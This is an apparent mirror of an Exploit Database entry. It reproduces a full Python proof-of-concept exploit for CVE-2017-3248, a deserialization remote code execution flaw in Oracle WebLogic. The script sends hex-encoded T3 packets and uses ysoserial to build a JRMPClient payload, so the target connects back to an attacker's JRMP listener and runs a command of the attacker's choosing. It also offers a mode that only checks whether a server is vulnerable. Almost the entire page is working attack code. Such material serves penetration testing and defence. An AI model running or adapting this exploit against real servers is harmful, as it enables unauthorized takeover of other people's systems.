Oracle WebLogic 12.1.2.0 – RMI Registry UnicastRef Object Java Deserialization Remote Code Execution

• Exploit Database
• 135 阅读

• 作者： bobsecq
  日期： 2018-07-07
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/44998/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147

  #!/usr/bin/python # -*- coding: utf-8 -*-   from argparse import RawTextHelpFormatter import socket, argparse, subprocess, ssl, os.path   HELP_MESSAGE = ''' -------------------------------------------------------------------------------------- Developped by bobsecq: quentin.hardy@protonmail.com (quentin.hardy@bt.com)   This script is the first public exploit/POC for: - Exploiting CVE-2017-3248 (Oracle WebLogic RMI Registry UnicastRef Object Java Deserialization Remote Code Execution) - Checking if a weblogic server is vulnerable   This script needs the last version of Ysoserial (https://github.com/frohoff/ysoserial)   Version affected (according to Oracle): - 10.3.6.0 - 12.1.3.0 - 12.2.1.0 - 12.2.1.1 -------------------------------------------------------------------------------------- ''' ''' Tested on 12.1.2.0   For technical information, see: - https://www.tenable.com/security/research/tra-2017-07 - http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html   Vulnerability identified by Jacob Baines (Tenable Network Security) but exploit/POC has not been published! '''   #COMMANDS ARGS_YSO_GET_PAYLOD = "JRMPClient {0}:{1} |xxd -p| tr -d '\n'" #{0}: IP, {1}: port for connecting 'back' (i.e. attacker IP) CMD_GET_JRMPCLIENT_PAYLOAD = "java -jar {0} {1}"# {0} YSOSERIAL_PATH, {1}ARGS_YSO_GET_PAYLOD CMD_YSO_LISTEN = "java -cp {0} ysoserial.exploit.JRMPListener {1} {2} '{3}'"# {0} YSOSERIAL_PATH, {1}PORT, {2}payloadType, {3}command   #PAYLOADS #A. Packet 1 to send: payload_1 = '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a' #B. Packet 2 to send: payload_2 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e32323700124141414141414141414141413154362e656883348cd60000000700001b59ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd071a7727000d3131312e3131312e302e31313161863d1d0000000078' #C. Packet 3 to send: #C.1 length payload_3_1 = "000003b3" #C.2 first part payload_3_2 = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000' #C.3.1 sub payload payload_3_3_1 = 'aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000' #C.3.2 Ysoserial Payload generated in real time payload_3_3_2 = "" #C.4 End of the payload payload_3_4 = 'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'   def runCmd(cmd): proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) stdout_value = proc.stdout.read() + proc.stderr.read() return stdout_value   def getJrmpClientPayloadEncoded(attackerIp, attackerJRMPListenerPort, ysoPath): completeCmd = CMD_GET_JRMPCLIENT_PAYLOAD.format(ysoPath, ARGS_YSO_GET_PAYLOD.format(attackerIp, attackerJRMPListenerPort)) print "[+] Ysoserial command (JRMP client): {0}".format(repr(completeCmd)) stdout = runCmd(cmd = completeCmd) return stdout   def exploit(targetIP, targetPort, attackerIP, attackerJRMPPort, cmd, testOnly=False, payloadType='CommonsCollections5', sslEnabled=False, ysoPath=""): if testOnly == True: attackerIP = "127.0.0.1" attackerJRMPPort = 0 print "[+] Connecting to {0}:{1} ...".format(targetIP, targetPort) if sslEnabled == True: print "[+] ssl mode enabled" s = ssl.wrap_socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) else: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) print "[+] ssl mode disabled" s.connect((targetIP, targetPort)) print "[+] Connected to {0}:{1}".format(targetIP, targetPort) print "[+] Sending first packet..." #print "[S1] Sending {0}".format(repr(payload_1.decode('hex'))) s.sendall(payload_1.decode('hex')) data = s.recv(4096) #print '[R1] Received', repr(data) print "[+] Sending second packet..." #print "[S2] Sending {0}".format(repr(payload_2.decode('hex'))) s.sendall(payload_2.decode('hex')) data = s.recv(4096) #print '[R2] Received', repr(data) print "[+] Generating with ysoserial the third packet which contains a JRMPClient payload..." payload_3_3_2 = getJrmpClientPayloadEncoded(attackerIp=attackerIP, attackerJRMPListenerPort=attackerJRMPPort, ysoPath=ysoPath) payload= payload_3_1 + payload_3_2 + payload_3_3_1 + payload_3_3_2 + payload_3_4 payload = payload.replace(payload_3_1, "0000{:04x}".format(len(payload)/2), 1) sendata = payload.decode('hex') if testOnly == False: print "[+] You have to execute the following command locally:" print "{0}".format(CMD_YSO_LISTEN.format(ysoPath, attackerJRMPPort, payloadType,cmd)) raw_input("[+] Press Enter when this previous command is running...") print "[+] Sending third packet..." #print "[S3] Sending {0}".format(repr(sendata)) s.sendall(sendata) data = s.recv(4096) s.close() #print '[R3] Received', repr(data) if testOnly == True: if "cannot be cast to weblogic" in str(data): print "[+] 'cannot be cast to weblogic' string in the third response from server" print "\n{2}\n[-] target {0}:{1} is not vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60) else: print "[+] 'cannot be cast to weblogic' string is NOT in the third response from server" print "\n{2}\n[+] target {0}:{1} is vulnerable\n{2}\n".format(targetIP, targetPort, '-'*60) else: print "[+] The target will connect to {0}:{1}".format(attackerIP, attackerJRMPPort) print "[+] The command should be executed on the target after connection on {0}:{1}".format(attackerIP, attackerJRMPPort)   def main(): argsParsed = argparse.ArgumentParser(description=HELP_MESSAGE, formatter_class=RawTextHelpFormatter) argsParsed.add_argument("-t", dest='target', required=True, help='target IP') argsParsed.add_argument("-p", dest='port', type=int, required=True, help='target port') argsParsed.add_argument("--jip", dest='attackerIP', required=False, help='Local JRMP listener ip') argsParsed.add_argument("--jport", dest='attackerPort', type=int, default=3412, required=False, help='Local JRMP listener port (default: %(default)s)') argsParsed.add_argument("--cmd", dest='cmdToExecute', help='Command to execute on the target') argsParsed.add_argument("--check", dest='check', action='store_true', default=False, help='Check if vulnerable') argsParsed.add_argument("--ssl", dest='sslEnabled', action='store_true', default=False, help='Enable ssl connection') argsParsed.add_argument("--ysopath", dest='ysoPath', required=True, default=False, help='Ysoserial path') argsParsed.add_argument("--payloadType", dest='payloadType', default="CommonsCollections5", help='Payload to use in JRMP listener (default: %(default)s)') args = dict(argsParsed.parse_args()._get_kwargs()) if os.path.isfile(args['ysoPath'])==False: print "[-] You have to give the path to Ysoserial with --ysopath (https://github.com/frohoff/ysoserial)!" return -1 if args['check'] == False and args['attackerIP'] == None: print "[-] You have to give an IP with --jip !" return -1 elif args['check'] == False and args['cmdToExecute'] == None: print "[-] You have to give a command to execute on the target with --cmd !" return -1 if args['check'] == True: print "[+] Checking if target {0}:{1} is vulnerable to CVE-2017-3248 without executing a system command on the target...".format(args['target'], args['port']) exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=None, attackerJRMPPort=None, cmd=None, testOnly=True, sslEnabled=args['sslEnabled'], ysoPath=args['ysoPath']) else: print "[+] Exploitingtarget {0}:{1}...".format(args['target'], args['port']) exploit(targetIP=args['target'], targetPort=args['port'], attackerIP=args['attackerIP'], attackerJRMPPort=args['attackerPort'], cmd=args['cmdToExecute'], payloadType=args['payloadType'], testOnly=False, sslEnabled=args['sslEnabled'],ysoPath=args['ysoPath'])   if __name__ == "__main__": main()